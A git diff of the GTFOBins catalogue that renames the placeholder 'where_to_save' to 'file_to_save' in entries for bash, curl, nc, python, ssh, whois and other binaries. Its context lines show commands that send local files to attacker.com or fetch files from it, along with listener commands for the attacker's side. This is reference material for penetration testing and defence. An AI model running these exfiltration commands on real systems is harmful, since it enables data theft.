diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 5be8eea..be7b655 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -13,7 +13,7 @@ functions: export RPORT=12345 export LFILE=file_to_send bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 68f77e5..8539b89 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -10,6 +10,6 @@ functions: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get - LFILE=where_to_save + LFILE=file_to_save curl $URL -o $LFILE --- diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 85fe375..7386e3f 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -13,7 +13,7 @@ functions: export RPORT=12345 export LFILE=file_to_send ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index d4415a2..fc4e27b 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -1,7 +1,7 @@ --- functions: upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. + - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 @@ -11,7 +11,7 @@ functions: - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | LPORT=12345 - LFILE=where_to_save + LFILE=file_to_save nc -l -p $LPORT > "$LFILE" reverse-shell-interactive: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 20e869f..6dc7765 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -38,7 +38,7 @@ functions: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get - export LFILE=where_to_save + export LFILE=file_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' reverse-shell-interactive: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index e9cc15c..ea943c0 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -20,7 +20,7 @@ functions: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get - export LFILE=where_to_save + export LFILE=file_to_save python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' reverse-shell-interactive: - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 3db6232..9796842 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -20,7 +20,7 @@ functions: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get - export LFILE=where_to_save + export LFILE=file_to_save python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' reverse-shell-interactive: - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 870b69f..9cc7489 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -24,13 +24,13 @@ functions: upload: - description: Send local file to a SSH server. code: | - RPATH=user@attacker.com:~/where_to_save + RPATH=user@attacker.com:~/file_to_save LPATH=file_to_send scp $LFILE $RPATH download: - description: Fetch a remote file from a SSH server. code: | RPATH=user@attacker.com:~/file_to_get - LFILE=where_to_save + LFILE=file_to_save scp $RPATH $LFILE --- diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md index ef10773..8c528e8 100644 --- a/_gtfobins/sftp.md +++ b/_gtfobins/sftp.md @@ -15,11 +15,11 @@ functions: code: | RHOST=user@attacker.com sftp $RHOST - put file_to_send where_to_save + put file_to_send file_to_save download: - description: Fetch a remote file from a SSH server. code: | RHOST=user@attacker.com sftp $RHOST - get file_to_get where_to_save + get file_to_get file_to_save --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 5ae09aa..71c5e10 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -13,13 +13,13 @@ functions: code: | HOST=user@attacker.com RPATH=file_to_get - LPATH=where_to_save + LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH upload: - description: Send local file to a SSH server. code: | HOST=user@attacker.com - RPATH=where_to_save + RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH file-read: diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index f8dffb8..1c141e6 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -10,6 +10,6 @@ functions: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get - export LFILE=where_to_save + export LFILE=file_to_save wget $URL -O $LFILE --- diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index ec39b9b..f0e0d21 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md @@ -3,13 +3,13 @@ description: | `whois` hangs waiting for the remote peer to close the socket. functions: upload: - - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. + - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send whois -h $RHOST -p $RPORT "`cat $LFILE`" - - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. + - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. code: | RHOST=attacker.com RPORT=12345 @@ -20,12 +20,12 @@ functions: code: | RHOST=attacker.com RPORT=12345 - LFILE=where_to_save + LFILE=file_to_save whois -h $RHOST -p $RPORT > "$LFILE" - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. code: | RHOST=attacker.com RPORT=12345 - LFILE=where_to_save + LFILE=file_to_save whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" ---